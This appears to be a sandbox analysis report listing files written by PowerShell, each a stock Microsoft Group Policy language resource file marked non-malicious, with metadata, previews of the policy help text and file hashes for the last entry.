                                                                                          Category:dropped
                                                                                          Size (bytes):4257
                                                                                          Entropy (8bit):4.850396400130338
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WFP">Windows File Protection</string>.. <string id="WFPDllCacheDir">Specify Windows File Protection cache location</string>.. <string id="WFPDllCacheDir_Help">This policy setting specifies an alternate location for the Windows File Protection cache.....If you enable this policy setting, enter the fully qualified local path to the new location in the "Cache file path" box.....If you disable this setting or do not configure it, the Windows File Protection cache is located in the %Systemroot%\System32\Dllcac
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1085), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):43147
                                                                                          Entropy (8bit):4.809526069081037
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WF_AllowedPrograms_Help">Allows you to view and change the program exceptions list defined by Group Policy. Windows Firewall uses two program exception lists: one is defined by Group Policy settings and the other is defined by the Windows Firewall component in Control Panel.....If you enable this policy setting, you can view and change the program exceptions list defined by Group Policy. If you add a program to this list and set its status to Enabled, that program can receive unsolicited incoming messages on any po
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1162
                                                                                          Entropy (8bit):4.9740818694409095
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffCommunities">Turn off the communities features</string>.. <string id="TurnOffCommunities_help">Windows Mail will not check your newsgroup servers for Communities support.</string>.. <string id="TurnOffWindowsMail">Turn off Windows Mail application</string>.. <string id="WindowsMail">Windows Mail</string>.. <string id="WindowsMail_help">Denies or allows access to the Windows Mail application.....If you enable this setting, access to the Windows Mail application is denied.....If you disable
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (432), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1636
                                                                                          Entropy (8bit):4.844281894305683
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableOnline">Prevent Windows Media DRM Internet Access</string>.. <string id="DisableOnlineExplain">Prevents Windows Media Digital Rights Management (DRM) from accessing the Internet (or intranet).....When enabled, Windows Media DRM is prevented from accessing the Internet (or intranet) for license acquisition and security upgrades.....When this policy is enabled, programs are not able to acquire licenses for secure content, upgrade Windows Media DRM security components, or restore backed up content licenses
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (560), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22067
                                                                                          Entropy (8bit):4.725628900708413
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Autodetect">Autodetect</string>.. <string id="ConfigureHTTPProxySettings">Configure HTTP Proxy</string>.. <string id="ConfigureHTTPProxySettingsExplain">This policy setting allows you to specify the HTTP proxy settings for Windows Media Player.....If you enable this policy setting, select one of the following proxy types:....- Autodetect: the proxy settings are automatically detected...- Custom: unique proxy settings are used...- Use browser proxy settings: browser's proxy settings are used.....If the Cus
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2609
                                                                                          Entropy (8bit):4.83243600779635
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WinMSG_NoAutoStartWindowsMsg_Comp">Do not automatically start Windows Messenger initially</string>.. <string id="WinMSG_NoAutoStartWindowsMsg_Help">This policy setting prevents Windows Messenger from automatically running at logon. ....If you enable this policy setting, Windows Messenger is not loaded automatically when a user logs on.....If you disable or do not configure this policy setting, Windows Messenger will be loaded automatically at logon.....Note: This policy setting simply prevents Windows Messenge
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5639
                                                                                          Entropy (8bit):4.939572011046928
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista products table</displayName>.. <description>This file contains all the product definitions used in supported on definitions.</description>.... <resources>.. <stringTable>.. Microsoft Windows -->.. <string id="MicrosoftWindows">Windows operating system</string>.. <string id="MicrosoftWindows2000">Windows 2000 operating systems</string>.. <string id="MicrosoftWindows2000_RTM">Windows 2000</string>.. <string id="MicrosoftWindows2000_SP1">Windows 2000 Service Pack 1</string>.. <string id="MicrosoftWindows2000_SP2">Windows 2000 Service Pack 2</string>.. <string id="MicrosoftWindows2000_SP3">Windows 2000
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (354), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14554
                                                                                          Entropy (8bit):4.769003944604622
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowAutoConfig">Allow remote server management through WinRM</string>.. <string id="AllowBasic">Allow Basic authentication</string>.. <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.....If you enable this policy setting, the WinRM client uses Basic authentication. If WinRM is configured to use HTTP transport, the user name and password are sent over the network as clear text.....If you disable or do
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5497
                                                                                          Entropy (8bit):4.839558778753586
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowRemoteShellAccess">Allow Remote Shell Access</string>.. <string id="AllowRemoteShellAccess_Help">This policy setting configures access to remote shells.....If you enable this policy setting and set it to False, new remote shell connections are rejected by the server.....If you disable or do not configure this policy setting, new remote shell connections are allowed.</string>.. <string id="IdleTimeout">Specify idle Timeout</string>.. <string id="IdleTimeout_Help">This policy setting configures th
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1011
                                                                                          Entropy (8bit):5.086298346478668
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Server 2008 base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by server components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008">At least Windows Server 2008</string>.. <string id="SUPPORTED_WindowsServer2003R2">At least Windows Server 2003 R2</string>.. <string id="ServerComponents">Server Components</string>.. <string id="ServerComponents_Help">Contains settings for server operating system components.</string>.. </stringTable>.. </resources>..</policyDefinitionR
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (561), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):34731
                                                                                          Entropy (8bit):4.71530009460394
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->.. .. Note that white space is preserved as is in the text shown in the Group Policy UI... Don't add extra line breaks at the beginning and end of text strings,.. and make sure that lines of text start in the FIRST column... -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WU_SUPPORTED_Windows7ToXPSP2">Windows 7, Windows Server 2008 R2, Windows Vista, Windows XP SP2</string>.. <string id="WU_SUPPORTED_Windows7_To_Win2kSP3_Or_XPSP1">Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2003, Windows XP SP2, Windows XP SP1 , Windows 2000
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (336), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1453
                                                                                          Entropy (8bit):4.91354096133356
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBlockingAppsAtShutdown">Turn off automatic termination of applications that block or cancel shutdown</string>.. <string id="AllowBlockingAppsAtShutdown_Explain">This policy setting specifies whether Windows will allow console applications and GUI applications without visible top-level windows to block or cancel shutdown. By default, such applications are automatically terminated if they attempt to cancel shutdown or block it indefinitely.....If you enable this setting, console applications or GUI applicat
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2619
                                                                                          Entropy (8bit):4.83283675002977
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CustomSearch">Custom Instant Search Internet search provider</string>.. <string id="CustomSearch_Explain">Set up the menu name and URL for the custom Internet search provider.....If you enable this setting, the specified menu name and URL will be used for Internet searches.....If you disable or not configure this setting, the default Internet search provider will be used.</string>.. <string id="NoSearchInternetInWordWheel">Hide the "Search the Internet" link from the Search box drop down.</string>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (591), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3464
                                                                                          Entropy (8bit):4.792120480185555
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2012 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_WorkFolders">Work Folders</string>.. <string id="Pol_MachineEnableWorkFolders">Force automatic setup for all users</string>.. <string id="Pol_MachineEnableWorkFolders_Help">This policy setting specifies whether Work Folders should be set up automatically for all users of the affected computer... ..If you enable this policy setting, Work Folders will be set up automatically for all users of the affected computer. This prevents users from choosing not to use Work Folders on the computer; it also pr
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1317
                                                                                          Entropy (8bit):5.059573414260519
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2013 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Automatically workplace join client computers</displayName>.. <description>This setting lets you configure how domain-joined client computers become workplace-joined with domain users in your organization.</description>.. <resources>.. <stringTable>.. <string id="WJ_WorkplaceJoinCategory">Workplace Join</string>.. <string id="WJ_AutoJoinExplain">This setting lets you configure how domain joined client computers become workplace joined with domain users at your organization.....If this setting is enabled, domain-joined client computers will automatically become workplace-joined upon domain user logon.....Note: Additional requirements may appl
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1812
                                                                                          Entropy (8bit):4.867263783263397
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">Fault Tolerant Heap</string>.. <string id="WdiScenarioExecutionPolicy">Configure Scenario Execution Level</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting permits or prohibits the Diagnostic Policy Service (DPS) from automatically resolving any heap corruption problems.....If you enable this policy setting, the DPS detects, troubleshoots, and attempts to resolve automatically any heap corruption problems.....If you disable this policy setting, Windows cann
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1509
                                                                                          Entropy (8bit):4.960947634536891
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Hotspot Authentication Group Policy Settings</displayName>.. <description>Hotspot Authentication Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="HotspotAuth_Category">Hotspot Authentication</string>.. <string id="HotspotAuth_Enable">Enable Hotspot Authentication</string>.. <string id="HotspotAuth_Enable_Help">This policy setting defines whether Wi-Fi hotspots are probed for Wireless Internet Service Provider roaming (WISPr) protocol support.....If a Wi-Fi hotspot supports the WISPr protocol, users can submit credentials when manually connecting to the network. If authentication is successful, users will b
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (402), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5220
                                                                                          Entropy (8bit):4.806973059665715
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="iSCSI_Category">iSCSI</string>.. <string id="iSCSIDiscovery_Category">iSCSI Target Discovery</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers">Do not allow manual configuration of iSNS servers</string>.. <string id="iSCSIDiscovery_ConfigureiSNSServers_Help">If enabled then new iSNS servers may not be added and thus new targets discovered via those iSNS servers; existing iSNS servers may not be removed. If disabled then new iSNS servers may be added and thus new targets discovered via those
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3422
                                                                                          Entropy (8bit):4.718448996775859
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Maintenance Scheduler Policies</displayName>.. <description>Maintenance Scheduler Group Policies</description>.. <resources>.. <stringTable>.. <string id="MaintenanceScheduler">Maintenance Scheduler</string>.. <string id="ActivationBoundary">Automatic Maintenance Activation Boundary</string>.. <string id="ActivationBoundaryHelp">.. This policy setting allows you to configure Automatic Maintenance activation boundary..... The maintenance activation boundary is the daily schduled time at which Automatic Maintenance starts.... If you enable this policy setting, this will override the default daily scheduled time
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (532), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8481
                                                                                          Entropy (8bit):4.839330009877803
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>DirectAccess Client Experience Settings Group Policy Template</displayName>.. <description>This admx file describes policy template for DirectAccess Client NCA component</description>.. <resources>.. <stringTable>.. <string id="NCA">DirectAccess Client Experience Settings</string>.. <string id="NCA_Help">This is the group policy template for DirectAccess Client Experience Settings. Please read the DirectAccess deployment guide for more information.</string>.. <string id="SupportEmail">Support Email Address</string>.. <string id="SupportEmail_Help">Specifies the e-mail address to be used when sending the log files that are generated by NCA to the network administrator. ....When the user sends the log files to the Administrator, NCA uses the default e-mail client to open a new message with the support email address in the To: field of the message, then attaches the generated log files
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (379), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6236
                                                                                          Entropy (8bit):4.8210465928673445
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>...... Overall category text -->.. <string id="PcaScenarioCategory">Application Compatibility Diagnostics</string>.. .... Generic WDI text -->.. <string id="WdiScenarioExecutionPolicyLevelResolution">Detection, Troubleshooting and Resolution</string>.. <string id="WdiScenarioExecutionPolicyLevelTsOnly">Detection and Troubleshooting Only</string>...... Individual scenario text -->.. <string id="DetectBlockedDriversText">Notify blocked drivers</string>.. <string id="DetectDepre
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (423), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3289
                                                                                          Entropy (8bit):4.684667062227081
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Scripted Diagnostics</displayName>.. <description>Scripted Diagnostics</description>.. <resources>.. <stringTable>.. <string id="ScriptedDiagnosticsCategory">Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicy">Configure Security Policy for Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicyExplain">This policy setting determines whether scripted diagnostics will execute diagnostic packages that are signed by untrusted publishers.....If you enable this policy setting, the scripted diagnostics execution engine validates the signer of any diagnostic package and runs only those signed by trust
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (472), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7668
                                                                                          Entropy (8bit):4.73074137043816
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File Classification Infrastructure Group Policy Definitions</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="AdrCat">Access-Denied Assistance</string>.. <string id="FciCat">File Classification Infrastructure</string>.. <string id="EnableManualUXDisplay">File Classification Infrastructure: Display Classification tab in File Explorer</string>.. <string id="EnableShellExecuteFileStreamCheck">Enable access-denied assistance on client for all file types</string>.. <string id="EnableShellExecuteFileStreamCheck_Descr">This Group Policy Setting should be set on Windows clients to enable access-denied assistance for all file types</string>.. <string id="EnableManualUXExplain">This policy setting controls whether the Classification
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (431), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):13466
                                                                                          Entropy (8bit):4.782394839113498
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>TCPIP Group Policy Template file</displayName>.. <description>This admx file describes policy template for TCPIP components</description>.. <resources>.. <stringTable>.. <string id="TCPIP">TCPIP Settings</string>.. <string id="Ipv6Transition">IPv6 Transition Technologies</string>.... <string id="ISATAP_State">Set ISATAP State</string>.. <string id="ISATAP_Router_Name">Set ISATAP Router Name</string>.. <string id="6to4_State">Set 6to4 State</string>.. <string id="6to4_Router_Name">Set 6to4 Relay Name</string>.. <string id="6to4_Router_Name_Resolution_Interval">Set 6to4 Relay Name Resolution Interval</string>.. <s
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1977
                                                                                          Entropy (8bit):4.903195660648944
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WLAN Service Group Policy Settings</displayName>.. <description>WLAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WlanSvc_Category">WLAN Service</string>.. <string id="NetworkCost_Category">WLAN Media Cost</string>.. <string id="SetCost">Set Cost</string>.. <string id="SetCost_Help">This policy setting configures the cost of Wireless LAN (WLAN) connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all WLAN connections on the local m
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2971
                                                                                          Entropy (8bit):4.817228267034193
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cwD5x8gmL0PfvW8N0qwDtCsiFcs2mANRqwDtCsiFnMlpV:lD5pmL0PfvWq0qwhsFcs2muRqwhsFnM1
                                                                                          MD5:761AF87D50F53F0CE9947B5D486C30FA
                                                                                          SHA1:DC926F9449848CCE778326607BD4787ED6C80A01
                                                                                          SHA-256:8F1F6C7509F5C7C27B8F6E5DCF81FB8C02AE3FFEE825F6CFA4171A712BE018D4
                                                                                          SHA-512:ECCF653D5935C3777F14F08C0F5318B927E230C08AAA09DEBFD09ACA23A27B0887FE94A8670B635FD7D7B6ACCF3D3DFED2BFBCD02298A5B58089D66219A7E366
                                                                                          Malicious:false
